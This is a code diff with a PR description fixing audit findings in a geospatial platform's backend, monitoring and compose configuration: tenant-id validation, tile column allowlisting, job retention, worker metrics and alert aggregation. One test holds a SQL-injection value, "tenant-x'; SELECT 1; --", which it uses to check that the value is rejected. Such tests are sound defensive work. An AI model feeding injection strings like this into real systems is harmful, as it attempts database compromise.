@@ -74,21 +75,22 @@ async def test_export_dataset_creates_temp_dir_after_staging_guard_passes(
 ) -> None:
     monkeypatch.setattr(settings, "upload_staging_dir", str(tmp_path))
 
-    async def _fake_run_ogr2ogr_export(
-        table_name: str,
-        output_path: str,
-        driver: str,
-        *,
-        schema: str,
-        target_srs: str | None = None,
-        bbox: list[float] | None = None,
-        where: str | None = None,
-        format_key: str = "",
-        pmtiles_maxzoom: int | None = None,
-        deadline: float | None = None,
-    ) -> None:
+    # fix(#1778): this double used to restate run_ogr2ogr_export's parameter
+    # list by hand. That is a mirror with no one holding it: adding a keyword
+    # to the real function made the double reject a call the real function
+    # accepts, and the failure named this test rather than the change. It now
+    # binds whatever it is called with against the REAL signature, which keeps
+    # the property the mirror was reaching for -- the caller passes something
+    # run_ogr2ogr_export would accept -- without going stale when a parameter
+    # is added. The sibling doubles in test_export_temp_cleanup.py take
+    # **kwargs and check nothing; this one checks and does not drift.
+    async def _fake_run_ogr2ogr_export(*args, **kwargs) -> None:
+        from app.processing.export.ogr import run_ogr2ogr_export
+
+        bound = inspect.signature(run_ogr2ogr_export).bind(*args, **kwargs)
+        bound.apply_defaults()
         # Simulate successful export by creating the output file.
-        Path(output_path).write_text("export-data", encoding="utf-8")
+        Path(bound.arguments["output_path"]).write_text("export-data", encoding="utf-8")
 
     monkeypatch.setattr(
         "app.processing.export.service.run_ogr2ogr_export", _fake_run_ogr2ogr_export

--- a/backend/tests/test_stalled_queue_sweep_624.py
+++ b/backend/tests/test_stalled_queue_sweep_624.py
@@ -24,7 +24,12 @@ from app.platform.jobs.worker import (
 )
 
 
-def _job(job_id, ingest_job_id: str | None = None, task_name: str = "t"):
+def _job(
+    job_id,
+    ingest_job_id: str | None = None,
+    task_name: str = "t",
+    queue: str = "ingest",
+):
     """A stand-in for procrastinate's Job.
 
     The payload attribute is ``task_kwargs``, NOT ``args`` — the DB column is
@@ -35,6 +40,11 @@ def _job(job_id, ingest_job_id: str | None = None, task_name: str = "t"):
         id=job_id,
         task_name=task_name,
         task_kwargs={"job_id": ingest_job_id} if ingest_job_id else {},
+        # fix(#1778): `queue` is a required field on procrastinate's Job, and
+        # the sweep labels its failure counter with it. Leaving it off is the
+        # same class of drift this docstring already warns about for
+        # `task_kwargs` -- the stub passed while the real Job carried more.
+        queue=queue,
     )
 
 

--- a/backend/tests/test_tenant_session_guc.py
+++ b/backend/tests/test_tenant_session_guc.py
@@ -222,10 +222,24 @@ async def test_guc_never_set_in_single_tenant(fresh_engine):
 
 
 @pytest.mark.asyncio
-async def test_guc_bound_param_no_sql_injection(fresh_engine):
-    """set_config uses a bound param: a value with a single quote must not raise."""
-    # If the tenant id were f-string'd into SQL, a single-quote would break parsing.
-    # A bound param passes cleanly through the driver.
+async def test_guc_refuses_a_tenant_id_that_is_not_a_uuid(fresh_engine):
+    """A value with a single quote must not raise, and must not reach the GUC.
+
+    fix(#1778 codex r5): the hook issues ``SET LOCAL app.current_tenant = '...'``
+    rather than ``SELECT set_config(..., true)``, because the SELECT form takes
+    the transaction's first snapshot and locks out SET TRANSACTION ISOLATION
+    LEVEL / DEFERRABLE. ``SET`` accepts no bind parameter, so the guard moved
+    from the parameter to the value: ``_normalize_context_tenant_id`` rejects
+    anything that is not a UUID.
+
+    This used to assert that the payload round-tripped through the bound
+    parameter, which was the right proof for that shape and the wrong property
+    to want. An unvalidated tenant id reaching ``app.current_tenant`` is not a
+    safe outcome even when it parses -- every RLS policy compares against that
+    GUC. The stronger guarantee is that it never gets there: no SQL error, no
+    injection, and the GUC left unset so RLS fail-closes exactly as it does for
+    an unset var.
+    """
     malicious_tid = "tenant-x'; SELECT 1; --"
 
     with patch.dict(os.environ, {"GEOLENS_TENANCY_MODE": "multi_tenant"}):
@@ -235,18 +249,49 @@ async def test_guc_bound_param_no_sql_injection(fresh_engine):
 
         token = current_tenant_var.set(malicious_tid)
         try:
-            # Should not raise — proves bound-param safety
+            # Must not raise: a rejected id is a no-op, not a broken statement.
             async with AsyncSession(fresh_engine) as session:
                 async with session.begin():
-                    result = await session.execute(
-                        text("SELECT current_setting('app.current_tenant', true)")
-                    )
-                    guc_val = result.scalar_one()
+                    guc_val = (
+                        await session.execute(
+                            text("SELECT current_setting('app.current_tenant', true)")
+                        )
+                    ).scalar_one()
+                    # And the transaction is still usable afterwards.
+                    assert (await session.execute(text("SELECT 1"))).scalar_one() == 1
 
-            # The exact value round-trips cleanly through the bound param
-            assert guc_val == malicious_tid, (
-                f"Expected {malicious_tid!r} but got {guc_val!r}"
+            assert guc_val != malicious_tid, (
+                "an unvalidated tenant id reached app.current_tenant; every RLS "
+                "policy compares against that GUC"
             )
+            assert not guc_val, f"expected the GUC to be left unset, got {guc_val!r}"
+        finally:
+            current_tenant_var.reset(token)
+            _reload_settings()
+
+    await fresh_engine.dispose()
+
+
+@pytest.mark.asyncio
+async def test_guc_still_carries_a_legitimate_tenant_id(fresh_engine):
+    """The other half: a real UUID still reaches the GUC, canonicalized."""
+    tenant_uuid = "3F2504E0-4F89-41D3-9A0C-0305E82C3301"
+
+    with patch.dict(os.environ, {"GEOLENS_TENANCY_MODE": "multi_tenant"}):
+        _reload_settings()
+
+        from app.core.db.tenant_session import current_tenant_var
+
+        token = current_tenant_var.set(tenant_uuid)
+        try:
+            async with AsyncSession(fresh_engine) as session:
+                async with session.begin():
+                    guc_val = (
+                        await session.execute(
+                            text("SELECT current_setting('app.current_tenant', true)")
+                        )
+                    ).scalar_one()
+            assert guc_val == tenant_uuid.lower()
         finally:
             current_tenant_var.reset(token)
             _reload_settings()

--- a/backend/tests/test_terminal_job_retention_1778.py
+++ b/backend/tests/test_terminal_job_retention_1778.py
@@ -1,0 +1,82 @@
+"""fix(#1778): terminal queue rows need a retention path.
+
+Nothing in the repository ever deleted a failed, cancelled or aborted
+``procrastinate_jobs`` row or its events. ``delete_old_jobs`` was never called,
+there is no pg_cron, no CronJob, no scheduled workflow and no periodic
+Procrastinate task, and ``POST /jobs/cleanup/stale/`` sweeps only the
+``ingest_jobs`` mirror -- whose own 30-day retention deletes the row that
+explains the queue row, leaving unattributable residue behind.
+"""
+
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from app.platform.jobs.worker import (
+    TERMINAL_JOB_PURGE_INTERVAL_SECONDS,
+    purge_expired_terminal_jobs,
+)
+
+
+def _task_app_with_manager():
+    manager = MagicMock()
+    manager.delete_old_jobs = AsyncMock(return_value=None)
+    task_app = MagicMock()
+    task_app.job_manager = manager
+    return task_app, manager
+
+
+@pytest.mark.asyncio
+async def test_purge_covers_every_terminal_status_and_uses_the_mirror_window():
+    task_app, manager = _task_app_with_manager()
+    with patch("app.processing.ingest.tasks.task_app", task_app):
+        with patch("app.core.config.settings.ingest_jobs_retention_days", 30):
+            await purge_expired_terminal_jobs()
+
+    manager.delete_old_jobs.assert_awaited_once()
+    kwargs = manager.delete_old_jobs.await_args.kwargs
+    # Procrastinate defaults every include_* to False, i.e. succeeded only --
+    # and succeeded rows are the one status this deployment never stores.
+    assert kwargs["include_failed"] is True
+    assert kwargs["include_cancelled"] is True
+    assert kwargs["include_aborted"] is True
+    # Keyed to INGEST_JOBS_RETENTION_DAYS so queue row and mirror row age out
+    # together.
+    assert kwargs["nb_hours"] == 30 * 24
+
+
+@pytest.mark.asyncio
+async def test_a_zero_retention_setting_disables_the_purge():
+    """0 means keep, matching the ingest_jobs mirror sweep."""
+    task_app, manager = _task_app_with_manager()
+    with patch("app.processing.ingest.tasks.task_app", task_app):
+        with patch("app.core.config.settings.ingest_jobs_retention_days", 0):
+            await purge_expired_terminal_jobs()
+
+    manager.delete_old_jobs.assert_not_awaited()
+
+
+@pytest.mark.asyncio
+async def test_a_purge_failure_never_kills_the_worker_loop():
+    from app.platform.jobs.worker import _purge_terminal_jobs_safely
+
+    task_app, manager = _task_app_with_manager()
+    manager.delete_old_jobs = AsyncMock(side_effect=RuntimeError("pool closed"))
+    with patch("app.processing.ingest.tasks.task_app", task_app):
+        with patch("app.core.config.settings.ingest_jobs_retention_days", 30):
+            await _purge_terminal_jobs_safely()
+
+
+def test_the_worker_runs_the_purge_at_startup_and_on_an_interval():
+    import inspect
+
+    from app.platform.jobs import worker as worker_module
+
+    src = inspect.getsource(worker_module.main)
+    assert "await _purge_terminal_jobs_safely()" in src, (
+        "the startup pass is what keeps the jobs-by-events join small"
+    )
+    assert "run_terminal_job_purges()" in src
+    assert TERMINAL_JOB_PURGE_INTERVAL_SECONDS > 0

--- a/backend/tests/test_tile_cols_cache_key_validation_1778.py
+++ b/backend/tests/test_tile_cols_cache_key_validation_1778.py
@@ -89,12 +89,18 @@ def test_every_subset_collapses_onto_one_key_at_high_zoom(cols):
 
 
 def test_an_allowlisted_name_adds_nothing_at_any_zoom():
-    """An explicit `tile_columns` allowlist is the same case as the zoom default."""
+    """An explicit `tile_columns` allowlist is the same case as the zoom default.
+
+    fix(#1778, second pass): a name OUTSIDE the allowlist now adds nothing
+    either, because `_select_tile_columns` intersects `cols=` with
+    `tile_columns` instead of unioning past it. That is the same collapse this
+    module was written for -- the tile is byte-identical to the unfiltered one
+    -- reached by the projection no longer changing at all.
+    """
     for z in (LOW, HIGH):
         assert _key("name", z, tile_columns=["name"]) == ""
-        # ...while a name OUTSIDE the allowlist still changes the projection.
-        assert _key("value", z, tile_columns=["name"]) == "value"
-        assert _key("name,value", z, tile_columns=["name"]) == "value"
+        assert _key("value", z, tile_columns=["name"]) == ""
+        assert _key("name,value", z, tile_columns=["name"]) == ""
 
 
 # ---------------------------------------------------------------------------

--- a/backend/tests/test_tile_column_allowlist.py
+++ b/backend/tests/test_tile_column_allowlist.py
@@ -133,21 +133,26 @@ def test_additional_columns_unioned_below_zoom_threshold():
     )
 
 
-def test_additional_columns_unioned_with_empty_allowlist():
-    """admin allowlist=[] still allows runtime opt-in via additional_columns."""
+def test_additional_columns_cannot_escape_empty_allowlist():
+    """fix(#1778): allowlist=[] means no attributes, `cols=` included.
+
+    Was `test_additional_columns_unioned_with_empty_allowlist`, which pinned
+    the opposite. `tile_columns == []` is documented as "never project
+    attributes" in this function, on DatasetResponse and on the metadata PATCH
+    schema; a runtime opt-in that walks past it makes the only per-dataset
+    attribute-exposure control on the tile surface advisory.
+    """
     result = _select_tile_columns(
         _DATASET_COLUMNS,
         14,
         tile_columns=[],
         additional_columns=["name", "population"],
     )
-    names = [c["name"] for c in result]
-    # Order matches dataset column_info iteration, not the additional_columns argument
-    assert names == ["name", "population"]
+    assert result == []
 
 
-def test_additional_columns_dedupes_against_base_selection():
-    """A column already in the base allowlist isn't duplicated when also in additional_columns."""
+def test_additional_columns_intersected_with_allowlist():
+    """fix(#1778): `cols=` may reorder/extend the zoom budget, not the allowlist."""
     result = _select_tile_columns(
         _DATASET_COLUMNS,
         14,
@@ -155,8 +160,20 @@ def test_additional_columns_dedupes_against_base_selection():
         additional_columns=["name", "population"],
     )
     names = [c["name"] for c in result]
-    # name stays (already allowlisted), population added (additional), category preserved
-    assert names == ["name", "category", "population"]
+    # `population` is not on the allowlist, so it does not reach the projection.
+    assert names == ["name", "category"]
+
+
+def test_additional_columns_still_override_the_zoom_budget_under_an_allowlist():
+    """An allowlisted column still flows at z<10 when `cols=` asks for it."""
+    result = _select_tile_columns(
+        _DATASET_COLUMNS,
+        2,
+        tile_columns=["population"],
+        additional_columns=["population"],
+    )
+    names = [c["name"] for c in result]
+    assert names == ["population"]
 
 
 def test_additional_columns_drops_unknown_and_invalid_names():
@@ -193,3 +210,18 @@ def test_additional_columns_none_or_empty_preserves_legacy_behavior():
         )
         == []
     )
+
+
+def test_build_tile_query_orders_before_the_feature_cap():
+    """fix(#1778): the 50k `LIMIT` needs an ORDER BY to be a pure function.
+
+    Without one, a tile whose bbox selects more than `_TILE_FEATURE_LIMIT`
+    rows returns an arbitrary subset, so the content-hash ETag flips between
+    rebuilds and each uvicorn worker can cache a different rendering.
+    """
+    query = _build_tile_query("perf_test", _DATASET_COLUMNS)
+    order_at = query.find("ORDER BY t.gid")
+    limit_at = query.find("LIMIT 50000")
+    assert order_at != -1, "vector tile query must order before the feature cap"
+    assert limit_at != -1
+    assert order_at < limit_at, "ORDER BY must precede the LIMIT it makes deterministic"

--- a/backend/tests/test_worker_process_metrics_1778.py
+++ b/backend/tests/test_worker_process_metrics_1778.py
@@ -1,0 +1,48 @@
+"""fix(#1778): the job worker must publish RSS and DB-pool metrics.
+
+``main()`` started exactly three background tasks: the health server, the job
+metrics collector and credential renewal. The memory collector exists for the
+case this process is most exposed to -- #643 was an OOM kill visible only in
+dmesg -- and the worker carries a 4 GB mem_limit against the API's 2 GB
+precisely because GDAL/OGR buffers during a large raster ingest are
+memory-hungry. It ran neither that nor the pool collector, so
+``GeoLensDbPoolSaturated`` could never fire for the worker either: it runs its
+own engine and its own pool.
+"""
+
+from __future__ import annotations
+
+import inspect
+
+from app.platform.jobs import worker as worker_module
+
+
+def test_worker_starts_the_memory_and_pool_collectors():
+    src = inspect.getsource(worker_module.main)
+    assert "update_memory_metrics()" in src, (
+        "the worker publishes no RSS gauge and no watermark warning"
+    )
+    assert "update_pool_metrics()" in src, (
+        "the worker runs its own pool, so the API's gauges do not cover it"
+    )
+
+
+def test_worker_cancels_them_on_shutdown():
+    """Every other background task here is cancelled and gathered; so are these."""
+    src = inspect.getsource(worker_module.main)
+    for name in ("memory_metrics_task", "pool_metrics_task"):
+        assert f"{name}.cancel()" in src, f"{name} is never cancelled"
+        assert src.count(name) >= 3, (
+            f"{name} must be created, cancelled and gathered like its siblings"
+        )
+
+
+def test_both_collectors_are_safe_off_linux():
+    """Neither loop needs /proc or multiprocess mode to be importable."""
+    from app.observability.metrics.memory import read_rss_bytes
+    from app.observability.metrics.pool import _refresh_pool_metrics
+
+    # read_rss_bytes returns None rather than raising when /proc is absent.
+    rss = read_rss_bytes()
+    assert rss is None or isinstance(rss, int)
+    assert inspect.iscoroutinefunction(_refresh_pool_metrics)

--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ -65,6 +65,9 @@ x-db-ssl-env: &db-ssl-env
   DB_MAX_OVERFLOW: "${DB_MAX_OVERFLOW:-3}"
   DB_POOL_TIMEOUT: "${DB_POOL_TIMEOUT:-30}"
   DB_POOL_RECYCLE: "${DB_POOL_RECYCLE:-1800}"
+  # fix(#1778 codex r1): see the note in docker-compose.yml. Documented in
+  # .env.example and passed nowhere, so the knob was inert.
+  DB_STATEMENT_TIMEOUT_SECONDS: "${DB_STATEMENT_TIMEOUT_SECONDS:-300}"
 
 x-storage-env: &storage-env
   STORAGE_PROVIDER: "${STORAGE_PROVIDER:-local}"

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -44,6 +44,14 @@ x-db-ssl-env: &db-ssl-env
   DB_MAX_OVERFLOW: "${DB_MAX_OVERFLOW:-3}"  # see README §"Connection Pool Budget"
   DB_POOL_TIMEOUT: "${DB_POOL_TIMEOUT:-30}"
   DB_POOL_RECYCLE: "${DB_POOL_RECYCLE:-1800}"
+  # fix(#1778 codex r1): the per-request query deadline. Documented in
+  # .env.example but passed nowhere, so the knob was inert -- neither manifest
+  # uses env_file, so a variable reaches the app only by being listed here.
+  # It belongs on this anchor rather than on the api service alone because the
+  # setting is read from app.core.config, which the migrate and worker images
+  # boot as well; only get_db applies it, so the worker is unaffected in
+  # behaviour and consistent in configuration.
+  DB_STATEMENT_TIMEOUT_SECONDS: "${DB_STATEMENT_TIMEOUT_SECONDS:-300}"
 
 x-storage-env: &storage-env
   STORAGE_PROVIDER: "${STORAGE_PROVIDER:-local}"

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -422,7 +422,11 @@ services:
       migrate:
         condition: service_completed_successfully
     healthcheck:
-      test: ["CMD-SHELL", "python -c \"import urllib.request; urllib.request.urlopen('http://localhost:8000/health')\""]
+      # fix(#1778): liveness, not readiness -- see the HEALTHCHECK comment in
+      # Dockerfile. /health also probes the cache and the object store, both of
+      # which the API is engineered to survive, and this probe gates
+      # `frontend: depends_on: api: service_healthy`.
+      test: ["CMD-SHELL", "python -c \"import urllib.request; urllib.request.urlopen('http://localhost:8000/health/live')\""]
       interval: 10s
       timeout: 5s
       retries: 3

--- a/infra/monitoring/alerts.test.yml
+++ b/infra/monitoring/alerts.test.yml
@@ -657,6 +657,50 @@ tests:
               description:
                 "15 jobs failed in the 'ingest' queue in the last 15 minutes."
 
+  # fix(#1778): the regression the aggregation closes. Two worker replicas each
+  # export their own geolens_jobs_failed_total for the same queue, because the
+  # counter is incremented in the process that performed the terminal
+  # transition. Each replica is at 3 over the window, under the threshold of 5;
+  # summed by queue the queue is at 6 and the alert fires. Under the bare
+  # increase() this rule used to carry, PromQL evaluated each series on its own
+  # and nothing fired while the queue was visibly failing.
+  - interval: 1m
+    name: "job failures split across worker replicas"
+    input_series:
+      - series: 'geolens_jobs_failed_total{queue="ingest", instance="worker-1:8001"}'
+        values: "0 0 0 0 0 1 1 1 1 1 2 2 2 2 2 3 3 3 3 3 4"
+      - series: 'geolens_jobs_failed_total{queue="ingest", instance="worker-2:8001"}'
+        values: "0 0 0 0 0 1 1 1 1 1 2 2 2 2 2 3 3 3 3 3 4"
+    promql_expr_test:
+      # The half that makes the case a case: each replica on its own is at 3,
+      # under the threshold of 5. Before the aggregation this is exactly what
+      # PromQL compared, one series at a time, and nothing fired.
+      - expr: increase(geolens_jobs_failed_total{instance="worker-1:8001"}[15m])
+        eval_time: 18m
+        exp_samples:
+          - labels: '{instance="worker-1:8001", queue="ingest"}'
+            value: 3
+      - expr: increase(geolens_jobs_failed_total{instance="worker-2:8001"}[15m])
+        eval_time: 18m
+        exp_samples:
+          - labels: '{instance="worker-2:8001", queue="ingest"}'
+            value: 3
+    alert_rule_test:
+      - eval_time: 18m
+        alertname: GeoLensJobFailures
+        exp_alerts:
+          # `instance` is gone: sum by (queue) is what an operator means by
+          # "this queue is failing", and it is exact once every replica is
+          # scraped -- which is why the worker job in prometheus.yml discovers
+          # them rather than naming one.
+          - exp_labels:
+              severity: warning
+              queue: ingest
+            exp_annotations:
+              summary: "Jobs failing in queue 'ingest'"
+              description:
+                "6 jobs failed in the 'ingest' queue in the last 15 minutes."
+
   - interval: 1m
     name: "db pool overflow in sustained use"
     input_series:

--- a/infra/monitoring/alerts.yml
+++ b/infra/monitoring/alerts.yml
@@ -239,7 +239,17 @@ groups:
             Threshold is tunable.
 
       - alert: GeoLensJobFailures
-        expr: increase(geolens_jobs_failed_total[15m]) > 5
+        # fix(#1778): `sum by (queue)`, not a bare increase(). The job counters
+        # are incremented at the terminal transition inside the worker process
+        # that performed it, so with several worker replicas each exports its
+        # own series for the same queue. A bare increase() is evaluated per
+        # series, so six failures split three-and-three across two replicas
+        # never crossed a threshold of five and the alert stayed silent while
+        # the queue was visibly failing. Summing by queue is the number an
+        # operator actually means, and it is exact as long as every replica is
+        # scraped -- see the worker job in prometheus.yml, which discovers them
+        # rather than naming one.
+        expr: sum by (queue) (increase(geolens_jobs_failed_total[15m])) > 5
         for: 2m
         labels:
           severity: warning

--- a/infra/monitoring/grafana-dashboard.json
+++ b/infra/monitoring/grafana-dashboard.json
@@ -299,7 +299,7 @@
             "type": "prometheus",
             "uid": "${datasource}"
           },
-          "expr": "geolens_jobs_queue_depth",
+          "expr": "max by (queue) (geolens_jobs_queue_depth)",
           "refId": "A",
           "legendFormat": "{{queue}}"
         }
@@ -351,7 +351,7 @@
             "type": "prometheus",
             "uid": "${datasource}"
           },
-          "expr": "geolens_jobs_active",
+          "expr": "max by (queue) (geolens_jobs_active)",
           "refId": "A",
           "legendFormat": "{{queue}}"
         }
@@ -403,7 +403,7 @@
             "type": "prometheus",
             "uid": "${datasource}"
           },
-          "expr": "rate(geolens_jobs_completed_total[15m])",
+          "expr": "sum by (queue) (rate(geolens_jobs_completed_total[15m]))",
           "refId": "A",
           "legendFormat": "{{queue}} completed"
         },
@@ -412,7 +412,7 @@
             "type": "prometheus",
             "uid": "${datasource}"
           },
-          "expr": "rate(geolens_jobs_failed_total[15m])",
+          "expr": "sum by (queue) (rate(geolens_jobs_failed_total[15m]))",
           "refId": "B",
           "legendFormat": "{{queue}} failed"
         }

--- a/infra/monitoring/prometheus.yml
+++ b/infra/monitoring/prometheus.yml
@@ -1,7 +1,7 @@
 # GeoLens reference Prometheus scrape config.
 # Usage and the batteries-included quickstart are in RUNBOOK.md §4 (Monitoring).
 #
-# Two scrape targets — the API and the worker expose SEPARATE /metrics endpoints:
+# Two scrape jobs — the API and the worker expose SEPARATE /metrics endpoints:
 #   api:8000     HTTP request metrics (rate/latency/errors) + DB connection-pool
 #                gauges + tile-cache hit/miss counters
 #   worker:8001  Procrastinate job-queue metrics (queue depth, active, completed,
@@ -12,6 +12,14 @@
 # Running Prometheus outside that network? Replace them with reachable host:port
 # (e.g. the API's host mapping is 127.0.0.1:8001 -> api:8000; the worker port is
 # internal-only, so join the Compose network or publish it).
+#
+# fix(#1778): the worker job DISCOVERS its targets rather than naming one. The
+# job counters (geolens_jobs_completed_total, geolens_jobs_failed_total) are
+# incremented in whichever worker process performed the terminal transition, so
+# each replica exports its own series and an unscraped replica's work is simply
+# invisible — its failures never reach GeoLensJobFailures, which sums by queue
+# and is only exact when every replica is scraped. A single static target was
+# correct at one replica and silently lossy at two.
 
 global:
   scrape_interval: 15s # matches the 15s gauge-refresh loop in the app
@@ -30,7 +38,28 @@ scrape_configs:
 
   - job_name: geolens-worker
     metrics_path: /metrics
-    static_configs:
-      - targets: ["worker:8001"]
-        labels:
-          service: worker
+    # Docker's embedded DNS returns one A record per running container of a
+    # Compose service, so this resolves to every replica of `worker` and
+    # re-resolves on each discovery cycle — scaling up or down needs no edit
+    # here. `type: A` and an explicit `port` because the plain service name has
+    # no SRV record to carry one.
+    dns_sd_configs:
+      - names: ["worker"]
+        type: A
+        port: 8001
+        refresh_interval: 30s
+    relabel_configs:
+      # Discovery leaves __address__ as an IP, which changes every restart and
+      # makes a target's history unreadable. Keep it as `instance` (it is what
+      # distinguishes the per-replica series) but label the job by service the
+      # way the api job does.
+      - target_label: service
+        replacement: worker
+    # Not on a Compose network? Replace the block above with the per-replica
+    # list, one entry per worker container — NOT one entry, or the job metrics
+    # of every other replica are lost:
+    #
+    #   static_configs:
+    #     - targets: ["worker-1:8001", "worker-2:8001"]
+    #       labels:
+    #         service: worker

--- a/scripts/check_env_doc_drift.py
+++ b/scripts/check_env_doc_drift.py
@@ -325,6 +325,50 @@ def compose_contract_errors(compose_files: tuple[Path, ...]) -> list[str]:
     return errors
 
 
+# fix(#1778 codex r1): DB_* Settings fields that are deliberately not passed to
+# the containers. Empty on purpose -- every entry here is a documented knob an
+# operator can set and the app will never see, so each one needs a reason.
+DB_KNOBS_NOT_PASSED_TO_CONTAINERS: frozenset[str] = frozenset()
+
+
+def db_knobs_absent_from_services(
+    compose_files: tuple[Path, ...],
+    documented: set[str],
+    settings_keys: set[str],
+) -> list[str]:
+    """Documented DB_* knobs that never reach the api or worker container.
+
+    fix(#1778 codex r1): the gate had no way to catch this. A new Settings
+    field documented in `.env.example` satisfied the two checks that already
+    existed -- it is documented, and it has a consumer (the Settings field
+    itself) -- while neither manifest listed it and neither uses `env_file`,
+    so the container never received it and the documented default was the only
+    value anyone could ever get. `DB_STATEMENT_TIMEOUT_SECONDS` shipped exactly
+    that way.
+
+    Scoped to the `DB_` prefix rather than to every Settings field: the whole
+    group is pool and query behaviour that an operator tunes per deployment,
+    they all belong on the same `x-db-ssl-env` anchor, and a prefix rule is one
+    a reviewer can check by eye. Widening it further would need an allowlist
+    entry for every key a service legitimately does not take.
+    """
+    candidates = {
+        key
+        for key in documented & settings_keys
+        if key.startswith("DB_") and key not in DB_KNOBS_NOT_PASSED_TO_CONTAINERS
+    }
+    errors: list[str] = []
+    for path in compose_files:
+        service_keys = _service_environment_keys(path.read_text())
+        for service in ("api", "worker"):
+            missing = sorted(candidates - service_keys.get(service, set()))
+            if missing:
+                errors.append(
+                    f"{path.name}:{service} never receives {', '.join(missing)}"
+                )
+    return errors
+
+
 def raw_environment_keys() -> set[str]:
     """Find non-Settings env reads needed to identify stale example entries."""
     keys: set[str] = set()
@@ -404,6 +448,14 @@ def main() -> int:
     contract_errors = compose_contract_errors(COMPOSE_FILES)
     if contract_errors:
         failures.append(("Compose service capability contract drift", contract_errors))
+
+    inert_db_knobs = db_knobs_absent_from_services(
+        COMPOSE_FILES, documented, settings_keys
+    )
+    if inert_db_knobs:
+        failures.append(
+            ("documented DB_* knobs that no container receives", inert_db_knobs)
+        )
 
     phantom_scripts = unresolvable_doc_script_refs()
     if phantom_scripts:


### PR DESCRIPTION
Platform, tiles, worker and export findings from the codebase audit 2026-08-30 (8dc529f17), tracked in #1778. Thirteen of the fourteen items in this lane's brief; one is out of scope by instruction. Every finding was re-verified against current main before any code was written, and all thirteen still reproduced.

Two files are in flight on #1791 and are deliberately untouched: `backend/app/processing/tiles/router.py` and `frontend/nginx.conf`. Where an item's fix reached into one of them, the rest of the item landed and the gap is called out below.

## What changed, item by item

**Vector tile determinism.** The 50000-row `LIMIT` in the MVT query had no `ORDER BY`, so a tile whose bbox selects more rows than the cap returned an arbitrary subset. Successive rebuilds could differ, which flips the content-hash ETag and lets each uvicorn worker hold a different rendering of the same tile. The cluster query's candidate CTE already orders by gid and says why; its `grouped` CTE had the same gap and gets the same treatment. Counterfactual: `test_build_tile_query_orders_before_the_feature_cap` fails on main (no `ORDER BY t.gid` in the query at all).

**`cols=` escaping `tile_columns`.** `_select_tile_columns` documents `tile_columns` as an absolute allowlist, and so do the `DatasetResponse` and metadata PATCH field descriptions in the published OpenAPI contract, but the `cols=` opt-in unioned any other column past it. `cols=` now overrides the zoom budget only. Two tests that pinned the union (`test_additional_columns_unioned_with_empty_allowlist`, and the allowlist case in `test_tile_cols_cache_key_validation_1778.py`) are rewritten to pin the intersection; on main the new assertions fail. The route docstring at `tiles/router.py:2446-2448` justifies the old behaviour with a claim that does not hold on the signed-template arm; that file is in flight, so the sentence is left for whoever lands next there.

**Bound parameters in tracebacks.** The engine was built without `hide_parameters`, which SQLAlchemy defaults to False, so every `StatementError` carries `[SQL: ...] [parameters: (...)]` and the DB error handler logs that with a traceback. The SEC-03 redactor is key-based and shallow, so it cannot see values inside the `exception` string. Counterfactual: deleting the one kwarg makes `test_app_engine_is_built_with_hide_parameters` fail (ran it).

**Share tokens in 5xx logs.** Both 5xx handlers logged `request.url.path` raw while the access-log line beside them has been redacted since #821, so a 500 or an operational-DB 503 on `/api/maps/shared/{token}` published a replayable capability. The redactor moves to `core/logging_config.py` so `standards/` can import it without reaching into the API layer, and learns the `/m/` embed prefix `frontend/nginx.conf` already redacts at the edge. Counterfactual: the new `test_the_two_5xx_handlers_redact_the_path_they_log` fails on main on both handlers.

**Global rate limit envelope.** slowapi enforces the default limit inside `SlowAPIMiddleware`, a synchronous `BaseHTTPMiddleware`, and `sync_check_limits` swaps a coroutine handler for slowapi's own, which answers `{"error": ...}` in `application/json` with no `Retry-After`. Decorated routes are exempted from that middleware, which is why both existing tests of the contract pass. The handler awaits nothing, so it becomes a plain `def`. The new test drives an undecorated route and carries its own counterfactual: `test_a_coroutine_handler_is_discarded_by_the_middleware` reproduces the old shape in the same run.

**Liveness/readiness split.** `/health` probes the database, the object store and the cache and 503s on any of them, while the cache is engineered to survive a Valkey outage. That probe is the Docker healthcheck and the gate on `frontend: depends_on: api: service_healthy`. New `/health/live`, and the api image `HEALTHCHECK` plus the compose healthcheck now target it. The route is `include_in_schema=False`, like the worker's own probes, so `backend/openapi.json` and both SDKs are unchanged — verified with `dump_openapi.py --check`. Counterfactual: `test_container_liveness_probes_target_the_liveness_route` fails on main.

**Worker process metrics.** The worker started three background tasks and ran neither the RSS collector nor the pool collector the API lifespan starts, though it hosts GDAL/OGR and carries a 4 GB `mem_limit` against the API's 2 GB. Counterfactual: `test_worker_starts_the_memory_and_pool_collectors` fails on main.

**`geolens_jobs_completed_total`.** Derived from a status row count, while the worker runs with `delete_jobs="successful"`, which deletes the row while it is still `doing`. No `succeeded` row is ever written and the events cascade away with it, so the counter, the RUNBOOK entry and the "Job throughput" Grafana panel have read zero since the initial release. It is now incremented by a Procrastinate worker middleware at the terminal transition. The `failed` branch stays a row count, because failed rows persist and `GeoLensJobFailures` depends on that. Counterfactual: `test_a_completed_job_increments_the_counter` has nothing to import on main, and `test_the_poll_no_longer_pretends_to_count_completions` fails there because the deleted branch would have counted.

**Terminal-row retention.** Nothing ever deleted a failed, cancelled or aborted queue row. `delete_old_jobs` is never called, there is no pg_cron, no CronJob, no scheduled workflow and no periodic task, and `POST /jobs/cleanup/stale/` sweeps only the `ingest_jobs` mirror — whose own 30-day retention removes the row that explains the queue row. The purge is keyed to `INGEST_JOBS_RETENTION_DAYS`, runs once at worker startup and every six hours after, and 0 disables it the way it disables the mirror sweep. Startup matters: the vendored query builds the jobs-by-events join as an unfiltered inline view before applying its predicate. Counterfactual: `test_purge_covers_every_terminal_status_and_uses_the_mirror_window` has nothing to import on main.

**COG download presign lifetime.** The s3 branch signed the redirect for a flat 3600 seconds, exchanging a 120-second, dataset-scoped, revocable download token for an hour-long bearer URL that authenticates nobody and that the bucket honours after the grant is revoked. The access gate above it is the full RBAC path, so private and internal datasets reach it. The window is now the remaining lifetime of the caller's token, capped at 300s and floored at 60s — the discipline `sign_url_with_deadline` already applies on the ingest presign path. The floor is there because the bucket evaluates the deadline on arrival and clocks disagree. Counterfactual: `test_the_redirect_no_longer_signs_a_flat_hour` fails on main.

